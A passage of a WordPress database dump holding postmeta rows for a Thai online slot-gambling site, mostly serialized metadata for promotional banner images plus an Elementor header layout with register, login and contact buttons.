ทดลอง'),(1770,241,'_wp_attached_file','2026/01/20-Slot-online-Megabet333-Biz.webp'),(1771,241,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:1200;s:6:\"height\";i:500;s:4:\"file\";s:42:\"2026/01/20-Slot-online-Megabet333-Biz.webp\";s:8:\"filesize\";i:96818;s:5:\"sizes\";a:4:{s:6:\"medium\";a:5:{s:4:\"file\";s:42:\"20-Slot-online-Megabet333-Biz-300x125.webp\";s:5:\"width\";i:300;s:6:\"height\";i:125;s:9:\"mime-type\";s:10:\"image/webp\";s:8:\"filesize\";i:12700;}s:5:\"large\";a:5:{s:4:\"file\";s:43:\"20-Slot-online-Megabet333-Biz-1024x427.webp\";s:5:\"width\";i:1024;s:6:\"height\";i:427;s:9:\"mime-type\";s:10:\"image/webp\";s:8:\"filesize\";i:72208;}s:9:\"thumbnail\";a:5:{s:4:\"file\";s:42:\"20-Slot-online-Megabet333-Biz-150x150.webp\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/webp\";s:8:\"filesize\";i:7386;}s:12:\"medium_large\";a:5:{s:4:\"file\";s:42:\"20-Slot-online-Megabet333-Biz-768x320.webp\";s:5:\"width\";i:768;s:6:\"height\";i:320;s:9:\"mime-type\";s:10:\"image/webp\";s:8:\"filesize\";i:49250;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(1772,241,'_wp_attachment_image_alt','สล็อตออนไลน์'),(1786,244,'_wp_attached_file','2026/01/21-Slot-online-wallet-Megabet333-Biz.webp'),(1787,244,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:1200;s:6:\"height\";i:500;s:4:\"file\";s:49:\"2026/01/21-Slot-online-wallet-Megabet333-Biz.webp\";s:8:\"filesize\";i:94376;s:5:\"sizes\";a:4:{s:6:\"medium\";a:5:{s:4:\"file\";s:49:\"21-Slot-online-wallet-Megabet333-Biz-300x125.webp\";s:5:\"width\";i:300;s:6:\"height\";i:125;s:9:\"mime-type\";s:10:\"image/webp\";s:8:\"filesize\";i:13674;}s:5:\"large\";a:5:{s:4:\"file\";s:50:\"21-Slot-online-wallet-Megabet333-Biz-1024x427.webp\";s:5:\"width\";i:1024;s:6:\"height\";i:427;s:9:\"mime-type\";s:10:\"image/webp\";s:8:\"filesize\";i:69916;}s:9:\"thumbnail\";a:5:{s:4:\"file\";s:49:\"21-Slot-online-wallet-Megabet333-Biz-150x150.webp\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/webp\";s:8:\"filesize\";i:7966;}s:12:\"medium_large\";a:5:{s:4:\"file\";s:49:\"21-Slot-online-wallet-Megabet333-Biz-768x320.webp\";s:5:\"width\";i:768;s:6:\"height\";i:320;s:9:\"mime-type\";s:10:\"image/webp\";s:8:\"filesize\";i:48716;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(1788,244,'_wp_attachment_image_alt','สล็อตเว็บตรง วอลเล็ต'),(1803,249,'_wp_attached_file','2026/01/22-Credit-free-Megabet333-Biz.webp'),(1804,249,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:1200;s:6:\"height\";i:500;s:4:\"file\";s:42:\"2026/01/22-Credit-free-Megabet333-Biz.webp\";s:8:\"filesize\";i:86370;s:5:\"sizes\";a:4:{s:6:\"medium\";a:5:{s:4:\"file\";s:42:\"22-Credit-free-Megabet333-Biz-300x125.webp\";s:5:\"width\";i:300;s:6:\"height\";i:125;s:9:\"mime-type\";s:10:\"image/webp\";s:8:\"filesize\";i:12486;}s:5:\"large\";a:5:{s:4:\"file\";s:43:\"22-Credit-free-Megabet333-Biz-1024x427.webp\";s:5:\"width\";i:1024;s:6:\"height\";i:427;s:9:\"mime-type\";s:10:\"image/webp\";s:8:\"filesize\";i:64230;}s:9:\"thumbnail\";a:5:{s:4:\"file\";s:42:\"22-Credit-free-Megabet333-Biz-150x150.webp\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/webp\";s:8:\"filesize\";i:6476;}s:12:\"medium_large\";a:5:{s:4:\"file\";s:42:\"22-Credit-free-Megabet333-Biz-768x320.webp\";s:5:\"width\";i:768;s:6:\"height\";i:320;s:9:\"mime-type\";s:10:\"image/webp\";s:8:\"filesize\";i:45884;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(1805,249,'_wp_attachment_image_alt','เครดิตฟรี กดรับเอง ยืนยันเบอร์'),(1817,252,'_wp_attached_file','2026/01/23-Credit-free-get-on-web-Megabet333-Biz.webp'),(1818,252,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:1200;s:6:\"height\";i:500;s:4:\"file\";s:53:\"2026/01/23-Credit-free-get-on-web-Megabet333-Biz.webp\";s:8:\"filesize\";i:98336;s:5:\"sizes\";a:4:{s:6:\"medium\";a:5:{s:4:\"file\";s:53:\"23-Credit-free-get-on-web-Megabet333-Biz-300x125.webp\";s:5:\"width\";i:300;s:6:\"height\";i:125;s:9:\"mime-type\";s:10:\"image/webp\";s:8:\"filesize\";i:14076;}s:5:\"large\";a:5:{s:4:\"file\";s:54:\"23-Credit-free-get-on-web-Megabet333-Biz-1024x427.webp\";s:5:\"width\";i:1024;s:6:\"height\";i:427;s:9:\"mime-type\";s:10:\"image/webp\";s:8:\"filesize\";i:73730;}s:9:\"thumbnail\";a:5:{s:4:\"file\";s:53:\"23-Credit-free-get-on-web-Megabet333-Biz-150x150.webp\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/webp\";s:8:\"filesize\";i:8576;}s:12:\"medium_large\";a:5:{s:4:\"file\";s:53:\"23-Credit-free-get-on-web-Megabet333-Biz-768x320.webp\";s:5:\"width\";i:768;s:6:\"height\";i:320;s:9:\"mime-type\";s:10:\"image/webp\";s:8:\"filesize\";i:52156;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(1819,252,'_wp_attachment_image_alt','เครดิตฟรี รับหน้าเว็บ'),(1838,258,'_wp_attached_file','2026/01/24-Credit-free-new-member-Megabet333-Biz.webp'),(1839,258,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:1200;s:6:\"height\";i:500;s:4:\"file\";s:53:\"2026/01/24-Credit-free-new-member-Megabet333-Biz.webp\";s:8:\"filesize\";i:92744;s:5:\"sizes\";a:4:{s:6:\"medium\";a:5:{s:4:\"file\";s:53:\"24-Credit-free-new-member-Megabet333-Biz-300x125.webp\";s:5:\"width\";i:300;s:6:\"height\";i:125;s:9:\"mime-type\";s:10:\"image/webp\";s:8:\"filesize\";i:12108;}s:5:\"large\";a:5:{s:4:\"file\";s:54:\"24-Credit-free-new-member-Megabet333-Biz-1024x427.webp\";s:5:\"width\";i:1024;s:6:\"height\";i:427;s:9:\"mime-type\";s:10:\"image/webp\";s:8:\"filesize\";i:66828;}s:9:\"thumbnail\";a:5:{s:4:\"file\";s:53:\"24-Credit-free-new-member-Megabet333-Biz-150x150.webp\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/webp\";s:8:\"filesize\";i:7158;}s:12:\"medium_large\";a:5:{s:4:\"file\";s:53:\"24-Credit-free-new-member-Megabet333-Biz-768x320.webp\";s:5:\"width\";i:768;s:6:\"height\";i:320;s:9:\"mime-type\";s:10:\"image/webp\";s:8:\"filesize\";i:46430;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(1840,258,'_wp_attachment_image_alt','เครดิตฟรี สมาชิกใหม่'),(1850,260,'_wp_attached_file','2026/01/25-Credit-free-50-Megabet333-Biz.webp'),(1851,260,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:1200;s:6:\"height\";i:500;s:4:\"file\";s:45:\"2026/01/25-Credit-free-50-Megabet333-Biz.webp\";s:8:\"filesize\";i:91696;s:5:\"sizes\";a:4:{s:6:\"medium\";a:5:{s:4:\"file\";s:45:\"25-Credit-free-50-Megabet333-Biz-300x125.webp\";s:5:\"width\";i:300;s:6:\"height\";i:125;s:9:\"mime-type\";s:10:\"image/webp\";s:8:\"filesize\";i:12462;}s:5:\"large\";a:5:{s:4:\"file\";s:46:\"25-Credit-free-50-Megabet333-Biz-1024x427.webp\";s:5:\"width\";i:1024;s:6:\"height\";i:427;s:9:\"mime-type\";s:10:\"image/webp\";s:8:\"filesize\";i:69702;}s:9:\"thumbnail\";a:5:{s:4:\"file\";s:45:\"25-Credit-free-50-Megabet333-Biz-150x150.webp\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/webp\";s:8:\"filesize\";i:7306;}s:12:\"medium_large\";a:5:{s:4:\"file\";s:45:\"25-Credit-free-50-Megabet333-Biz-768x320.webp\";s:5:\"width\";i:768;s:6:\"height\";i:320;s:9:\"mime-type\";s:10:\"image/webp\";s:8:\"filesize\";i:47222;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(1852,260,'_wp_attachment_image_alt','เครดิตฟรี 50 ได้จริง'),(1923,268,'_elementor_source','post'),(1924,268,'_elementor_edit_mode','builder'),(1925,268,'_elementor_template_type','header'),(1926,268,'_elementor_version','3.33.4'),(1927,268,'_elementor_pro_version','3.32.3'),(1928,268,'_wp_page_template','default'),(1929,268,'_elementor_data','[{\"id\":\"2a37657\",\"elType\":\"section\",\"settings\":{\"layout\":\"full_width\",\"structure\":\"50\",\"content_position\":\"middle\",\"background_background\":\"gradient\",\"background_color\":\"#530707\",\"background_color_b\":\"#140106\",\"box_shadow_box_shadow_type\":\"yes\",\"box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"color\":\"#FBFBFB\"}},\"elements\":[{\"id\":\"f229e82\",\"elType\":\"column\",\"settings\":{\"_column_size\":20,\"_inline_size\":14.7859999999999995878852132591418921947479248046875,\"_inline_size_mobile\":80},\"elements\":[{\"id\":\"265c642\",\"elType\":\"widget\",\"settings\":{\"__dynamic__\":{\"image\":\"[elementor-tag id=\\\"\\\" name=\\\"site-logo\\\" settings=\\\"%7B%7D\\\"]\"}},\"elements\":[],\"widgetType\":\"theme-site-logo\"}],\"isInner\":false},{\"id\":\"43121f4\",\"elType\":\"column\",\"settings\":{\"_column_size\":20,\"_inline_size\":48.546999999999997044142219237983226776123046875,\"_inline_size_tablet\":20,\"_inline_size_mobile\":20},\"elements\":[{\"id\":\"ece9e44\",\"elType\":\"widget\",\"settings\":{\"menu_name\":\"Menu\",\"menu\":\"main-menu\",\"full_width\":\"stretch\",\"color_dropdown_item\":\"#FFFFFF\",\"background_color_dropdown_item\":\"#000000\",\"background_color_dropdown_item_hover\":\"#FFFFFFBA\",\"toggle_color\":\"#FFFFFF\",\"toggle_size_mobile\":{\"unit\":\"px\",\"size\":27,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"nav-menu\"}],\"isInner\":false},{\"id\":\"4603d33\",\"elType\":\"column\",\"settings\":{\"_column_size\":20,\"_inline_size\":13.419000000000000483169060316868126392364501953125,\"_inline_size_tablet\":21,\"_inline_size_mobile\":50},\"elements\":[{\"id\":\"469ae70\",\"elType\":\"widget\",\"settings\":{\"text\":\"\\u0e2a\\u0e21\\u0e31\\u0e04\\u0e23\\u0e2a\\u0e21\\u0e32\\u0e0a\\u0e34\\u0e01\",\"link\":{\"url\":\"https:\\/\\/luca333auto.com\\/auth\\/register\",\"is_external\":\"on\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"justify\",\"hover_animation\":\"shrink\",\"button_text_color\":\"#FFFFFF\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"f2a695b\",\"elType\":\"column\",\"settings\":{\"_column_size\":20,\"_inline_size\":11.8800000000000007815970093361102044582366943359375,\"_inline_size_tablet\":21,\"_inline_size_mobile\":50},\"elements\":[{\"id\":\"bb7db24\",\"elType\":\"widget\",\"settings\":{\"text\":\"\\u0e40\\u0e02\\u0e49\\u0e32\\u0e2a\\u0e39\\u0e48\\u0e23\\u0e30\\u0e1a\\u0e1a\",\"link\":{\"url\":\"https:\\/\\/luca333auto.com\\/\",\"is_external\":\"on\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"justify\",\"button_text_color\":\"#A30808\",\"background_color\":\"#FFFFFF\",\"button_background_hover_color\":\"#FFFFFF\",\"hover_animation\":\"shrink\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"f85ac23\",\"elType\":\"column\",\"settings\":{\"_column_size\":20,\"_inline_size\":11.3510000000000008668621376273222267627716064453125,\"_inline_size_tablet\":18},\"elements\":[{\"id\":\"5958e0a\",\"elType\":\"widget\",\"settings\":{\"text\":\"\\u0e15\\u0e34\\u0e14\\u0e15\\u0e48\\u0e2d\\u0e40\\u0e23\\u0e32\",\"link\":{\"url\":\"luca333line.com\",\"is_external\":\"on\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"justify\",\"button_text_color\":\"#FFFFFF\",\"background_color\":\"#056704\",\"hover_animation\":\"shrink\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false}],\"isInner\":false}]'),(1930,268,'_elementor_conditions','a:1:{i:0;s:15:\"include/general\";}'),(1963,271,'_wp_attached_file','2026/02/Spin-slot-1baht-Yok789.webp'),(1964,271,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:1600;s:6:\"height\";i:800;s:4:\"file\";s:35:\"2026/02/Spin-slot-1baht-Yok789.webp\";s:8:\"filesize\";i:145068;s:5:\"sizes\";a:5:{s:6:\"medium\";a:5:{s:4:\"file\";s:35:\"Spin-slot-1baht-Yok789-300x150.webp\";s:5:\"width\";i:300;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/webp\";s:8:\"filesize\";i:16866;}s:5:\"large\";a:5:{s:4:\"file\";s:36:\"Spin-slot-1baht-Yok789-1024x512.webp\";s:5:\"width\";i:1024;s:6:\"height\";i:512;s:9:\"mime-type\";s:10:\"image/webp\";s:8:\"filesize\";i:82712;}s:9:\"thumbnail\";a:5:{s:4:\"file\";s:35:\"Spin-slot-1baht-Yok789-150x150.webp\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/webp\";s:8:\"filesize\";i:9688;}s:12:\"medium_large\";a:5:{s:4:\"file\";s:35:\"Spin-slot-1baht-Yok789-768x384.webp\";s:5:\"width\";i:768;s:6:\"height\";i:384;s:9:\"mime-type\";s:10:\"image/webp\";s:8:\"filesize\";i:59194;}s:9:\"1536x1536\";a:5:{s:4:\"file\";s:36:\"Spin-slot-1baht-Yok789-1536x768.webp\";s:5:\"width\";i:1536;s:6:\"height\";i:768;s:9:\"mime-type\";s:10:\"image/webp\";s:8:\"filesize\";i:128674;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(1965,272,'_wp_attached_file','2026/02/Spin-slot-free-demo-Yok789.webp'),(1966,272,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:1600;s:6:\"height\";i:800;s:4:\"file\";s:39:\"2026/02/Spin-slot-free-demo-Yok789.webp\";s:8:\"filesize\";i:195028;s:5:\"sizes\";a:5:{s:6:\"medium\";a:5:{s:4:\"file\";s:39:\"Spin-slot-free-demo-Yok789-300x150.webp\";s:5:\"width\";i:300;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/webp\";s:8:\"filesize\";i:18038;}s:5:\"large\";a:5:{s:4:\"file\";s:40:\"Spin-slot-free-demo-Yok789-1024x512.webp\";s:5:\"width\";i:1024;s:6:\"height\";i:512;s:9:\"mime-type\";s:10:\"image/webp\";s:8:\"filesize\";i:100894;}s:9:\"thumbnail\";a:5:{s:4:\"file\";s:39:\"Spin-slot-free-demo-Yok789-150x150.webp\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/webp\";s:8:\"filesize\";i:10494;}s:12:\"medium_large\";a:5:{s:4:\"file\";s:39:\"Spin-slot-free-demo-Yok789-768x384.webp\";s:5:\"width\";i:768;s:6:\"height\";i:384;s:9:\"mime-type\";s:10:\"image/webp\";s:8:\"filesize\";i:68994;}s:9:\"1536x1536\";a:5:{s:4:\"file\";s:40:\"Spin-slot-free-demo-Yok789-1536x768.webp\";s:5:\"width\";i:1536;s:6:\"height\";i:768;s:9:\"mime-type\";s:10:\"image/webp\";s:8:\"filesize\";i:164710;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(1967,273,'_wp_attached_file','2026/02/Web-slot-hot-bet1-Yok789.webp'),(1968,273,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:1600;s:6:\"height\";i:800;s:4:\"file\";s:37:\"2026/02/Web-slot-hot-bet1-Yok789.webp\";s:8:\"filesize\";i:150142;s:5:\"sizes\";a:5:{s:6:\"medium\";a:5:{s:4:\"file\";s:37:\"Web-slot-hot-bet1-Yok789-300x150.webp\";s:5:\"width\";i:300;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/webp\";s:8:\"filesize\";i:17396;}s:5:\"large\";a:5:{s:4:\"file\";s:38:\"Web-slot-hot-bet1-Yok789-1024x512.webp\";s:5:\"width\";i:1024;s:6:\"height\";i:512;s:9:\"mime-type\";s:10:\"image/webp\";s:8:\"filesize\";i:84936;}s:9:\"thumbnail\";a:5:{s:4:\"file\";s:37:\"Web-slot-hot-bet1-Yok789-150x150.webp\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/webp\";s:8:\"filesize\";i:10082;}s:12:\"medium_large\";a:5:{s:4:\"file\";s:37:\"Web-slot-hot-bet1-Yok789-768x384.webp\";s:5:\"width\";i:768;s:6:\"height\";i:384;s:9:\"mime-type\";s:10:\"image/webp\";s:8:\"filesize\";i:61100;}s:9:\"1536x1536\";a:5:{s:4:\"file\";s:38:\"Web-slot-hot-bet1-Yok789-1536x768.webp\";s:5:\"width\";i:1536;s:6:\"height\";i:768;s:9:\"mime-type\";s:10:\"image/webp\";s:8:\"filesize\";i:131394;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(1969,274,'_wp_attached_file','2026/02/True-wallet-Yok789.webp'),(1970,274,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:800;s:6:\"height\";i:800;s:4:\"file\";s:31:\"2026/02/True-wallet-Yok789.webp\";s:8:\"filesize\";i:90838;s:5:\"sizes\";a:3:{s:6:\"medium\";a:5:{s:4:\"file\";s:31:\"True-wallet-Yok789-300x300.webp\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/webp\";s:8:\"filesize\";i:23670;}s:9:\"thumbnail\";a:5:{s:4:\"file\";s:31:\"True-wallet-Yok789-150x150.webp\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/webp\";s:8:\"filesize\";i:8788;}s:12:\"medium_large\";a:5:{s:4:\"file\";s:31:\"True-wallet-Yok789-768x768.webp\";s:5:\"width\";i:768;s:6:\"height\";i:768;s:9:\"mime-type\";s:10:\"image/webp\";s:8:\"filesize\";i:77862;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(1971,275,'_wp_attached_file','2026/02/HBD-Bonus-Banner-Yok789.webp'),(1972,275,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:1200;s:6:\"height\";i:500;s:4:\"file\";s:36:\"2026/02/HBD-Bonus-Banner-Yok789.webp\";s:8:\"filesize\";i:100640;s:5:\"sizes\";a:4:{s:6:\"medium\";a:5:{s:4:\"file\";s:36:\"HBD-Bonus-Banner-Yok789-300x125.webp\";s:5:\"width\";i:300;s:6:\"height\";i:125;s:9:\"mime-type\";s:10:\"image/webp\";s:8:\"filesize\";i:15412;}s:5:\"large\";a:5:{s:4:\"file\";s:37:\"HBD-Bonus-Banner-Yok789-1024x427.webp\";s:5:\"width\";i:1024;s:6:\"height\";i:427;s:9:\"mime-type\";s:10:\"image/webp\";s:8:\"filesize\";i:77698;}s:9:\"thumbnail\";a:5:{s:4:\"file\";s:36:\"HBD-Bonus-Banner-Yok789-150x150.webp\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/webp\";s:8:\"filesize\";i:9472;}s:12:\"medium_large\";a:5:{s:4:\"file\";s:36:\"HBD-Bonus-Banner-Yok789-768x320.webp\";s:5:\"width\";i:768;s:6:\"height\";i:320;s:9:\"mime-type\";s:10:\"image/webp\";s:8:\"filesize\";i:54906;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(1973,276,'_wp_attached_file','2026/02/lucky-wheel-Banner-Yok789.webp'),(1974,276,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:1200;s:6:\"height\";i:500;s:4:\"file\";s:38:\"2026/02/lucky-wheel-Banner-Yok789.webp\";s:8:\"filesize\";i:92134;s:5:\"sizes\";a:4:{s:6:\"medium\";a:5:{s:4:\"file\";s:38:\"lucky-wheel-Banner-Yok789-300x125.webp\";s:5:\"width\";i:300;s:6:\"height\";i:125;s:9:\"mime-type\";s:10:\"image/webp\";s:8:\"filesize\";i:13638;}s:5:\"large\";a:5:{s:4:\"file\";s:39:\"lucky-wheel-Banner-Yok789-1024x427.webp\";s:5:\"width\";i:1024;s:6:\"height\";i:427;s:9:\"mime-type\";s:10:\"image/webp\";s:8:\"filesize\";i:69528;}s:9:\"thumbnail\";a:5:{s:4:\"file\";s:38:\"lucky-wheel-Banner-Yok789-150x150.webp\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/webp\";s:8:\"filesize\";i:7952;}s:12:\"medium_large\";a:5:{s:4:\"file\";s:38:\"lucky-wheel-Banner-Yok789-768x320.webp\";s:5:\"width\";i:768;s:6:\"height\";i:320;s:9:\"mime-type\";s:10:\"image/webp\";s:8:\"filesize\";i:48610;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(1975,277,'_wp_attached_file','2026/02/Reward-10_-Banner-Yok789.webp'),(1976,277,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:1200;s:6:\"height\";i:500;s:4:\"file\";s:37:\"2026/02/Reward-10_-Banner-Yok789.webp\";s:8:\"filesize\";i:105254;s:5:\"sizes\";a:4:{s:6:\"medium\";a:5:{s:4:\"file\";s:37:\"Reward-10_-Banner-Yok789-300x125.webp\";s:5:\"width\";i:300;s:6:\"height\";i:125;s:9:\"mime-type\";s:10:\"image/webp\";s:8:\"filesize\";i:14390;}s:5:\"large\";a:5:{s:4:\"file\";s:38:\"Reward-10_-Banner-Yok789-1024x427.webp\";s:5:\"width\";i:1024;s:6:\"height\";i:427;s:9:\"mime-type\";s:10:\"image/webp\";s:8:\"filesize\";i:78200;}s:9:\"thumbnail\";a:5:{s:4:\"file\";s:37:\"Reward-10_-Banner-Yok789-150x150.webp\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/webp\";s:8:\"filesize\";i:9092;}s:12:\"medium_large\";a:5:{s:4:\"file\";s:37:\"Reward-10_-Banner-Yok789-768x320.webp\";s:5:\"width\";i:768;s:6:\"height\";i:320;s:9:\"mime-type\";s:10:\"image/webp\";s:8:\"filesize\";i:54416;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(1977,278,'_wp_attached_file','2026/02/Slot-NO1-Yok789.webp'),(1978,278,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:800;s:6:\"height\";i:800;s:4:\"file\";s:28:\"2026/02/Slot-NO1-Yok789.webp\";s:8:\"filesize\";i:71422;s:5:\"sizes\";a:3:{s:6:\"medium\";a:5:{s:4:\"file\";s:28:\"Slot-NO1-Yok789-300x300.webp\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/webp\";s:8:\"filesize\";i:20532;}s:9:\"thumbnail\";a:5:{s:4:\"file\";s:28:\"Slot-NO1-Yok789-150x150.webp\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s